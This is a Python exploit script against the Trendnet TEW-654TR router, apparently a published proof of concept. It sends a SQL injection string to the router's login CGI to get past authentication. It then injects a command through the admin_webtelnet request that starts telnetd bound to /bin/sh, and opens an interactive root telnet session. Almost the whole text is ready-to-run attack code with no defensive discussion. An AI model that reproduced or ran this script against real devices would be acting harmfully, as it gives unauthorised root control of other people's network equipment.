Trendnet TEW654TR Exploit Script

1. #!/usr/bin/env python
2.  
3. # Pop a root shell on the TEW-654TR via SQL injection & command injection.
4. # Currently only works from the LAN side.
5.  
6. import re
7. import httplib
8. import urllib
9. import socket
10. import os
11.  
12. class Logging:
13.     WARN=0
14.     INFO=1
15.     DEBUG=2
16.     prefixes=[]
17.     prefixes.append(" [!] ")
18.     prefixes.append(" [+] ")
19.     prefixes.append(" [@] ")
20.     @classmethod
21.     def log_msg(klass,msg,level=INFO):
22.         pref=Logging.prefixes[level]
23.         print pref+msg
24.  
25. def test_telnet():
26.     s=socket.socket()
27.     try:
28.         s.connect(("192.168.10.1",23))
29.     except Exception as e:
30.         return False
31.     return True
32.  
33. def check_authentication(data):
34.     fail_re=re.compile('.*<redirect_page>back</redirect_page>.*')
35.     success_re=re.compile('.*<redirect_page>default</redirect_page>')
36.  
37.     success=None
38.     for line in data.splitlines():
39.         if fail_re.match(line):
40.             success=False
41.             Logging.log_msg(line,Logging.DEBUG)
42.             break
43.         elif success_re.match(line):
44.             success=True
45.             #Logging.log_msg(line,Logging.DEBUG)
46.             break
47.     return success
48.  
49.  
50.  
51. SQL_INJECTION="a';select 1;--"
52. TELNET_INJECTION="/usr/sbin/telnetd -l /bin/sh"
53.  
54. username=SQL_INJECTION
55. password=""
56.  
57. #use an array of tuples rather than a dict to guarantee parameter order
58. params="request=login"
59. params+="&user_name="+username
60. params+="&user_pwd"+urllib.quote(password)
61.  
62. headers= {"Host":"192.168.10.1",
63.             "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:8.0.1) Gecko/20100101 Firefox/8.0.1",
64.             "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
65.             "Accept-Language":"en-us,en;q=0.5",
66.             "Content-Type":"application/x-www-form-urlencoded",
67.             "Referer":"http://192.168.10.1/login.htm"}
68.  
69. Logging.log_msg("Attempting to authenticate using SQL injection.")
70. #Logging.log_msg("SQL injection string set to: "+SQL_INJECTION)
71. Logging.log_msg("Sending POST.")
72. conn=httplib.HTTPConnection("192.168.10.1")
73.  
74. conn.request("POST","/my_cgi.cgi?0.5219313003118983",params,headers)
75.  
76. response=conn.getresponse()
77. data=response.read()
78.  
79. Logging.log_msg("Got response: %s %s"%(str(response.status),response.reason))
80. conn.close()
81.  
82.  
83. success=check_authentication(data)
84. if True==success:
85.     Logging.log_msg("Authentication successful.")
86. elif False==success:
87.     Logging.log_msg("Authentication failed. Exiting.",Logging.WARN)
88.     exit(1)
89. else:
90.     Logging.log_msg("Unrecognized result.",Logging.WARN)
91.     exit(1)
92.  
93.  
94. Logging.log_msg("Attempting to start telnetd via command injection.")
95. params="request=admin_webtelnet"
96. params+="&cmd="+urllib.quote(TELNET_INJECTION)
97. conn=httplib.HTTPConnection("192.168.10.1")
98. headers["Referer"]="http://192.168.10.1/st_device.htm"
99. conn.request("POST","/my_cgi.cgi?0.19909728029442098",params,headers)
100.  
101. response=conn.getresponse()
102.  
103. Logging.log_msg("Got response: %s %s"%(str(response.status),response.reason))
104.  
105. data=response.read()
106. conn.close()
107.  
108.  
109.  
110. if test_telnet():
111.     Logging.log_msg("Telnet started.")
112. else:
113.     Logging.log_msg("Telnet not started successfully.",Logging.WARN)
114.     exit(1)
115.  
116.  
117. Logging.log_msg("Starting interactive telnet session.")
118. os.system("telnet 192.168.10.1")